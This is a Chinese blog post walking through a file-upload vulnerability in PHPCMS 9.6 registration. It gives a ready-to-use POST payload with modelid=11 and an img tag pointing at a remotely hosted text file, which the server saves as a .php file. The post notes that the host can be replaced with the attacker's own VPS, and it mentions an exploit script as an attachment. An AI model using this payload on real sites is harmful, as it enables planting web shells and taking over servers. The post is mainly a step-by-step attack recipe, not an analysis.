此处直接使用exp,python脚本来复现漏洞。复现结果如下:
exp.py文件在附件中,需要在文件内更改url和语句来食用:)
打开网站,来到注册页
填好信息,提交的时候进行抓包
发送到repeater后,进行数据修改,即替换以下payload(注册信息自定义):
siteid=1&modelid=11&username=test2&password=test2123&email=test2@163.com&info[content]=<img src=http://127.0.0.1/phpcms96/phpinfo.txt?.php#.jpg>&dosubmit=1&protocol=
重点:modelid值必须为11,否则无法成功。
并且注意“127.0.0.1”ip可换成vps的ip或网址,此处为了复现的方便在本地创建了一句话文件。并且注册信息要改变(即username,email等字段),不然可能会失败。
文本文件phpinfo.txt
内容为<?php phpinfo() ?>
, 作测试用。
点击“send”后得到响应包,可见包含了上传文件的地址:
访问该地址,可见文件已成功上传。
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
没勇气先生
发表于 2022-4-24
附件呢?
评论列表
加载数据中...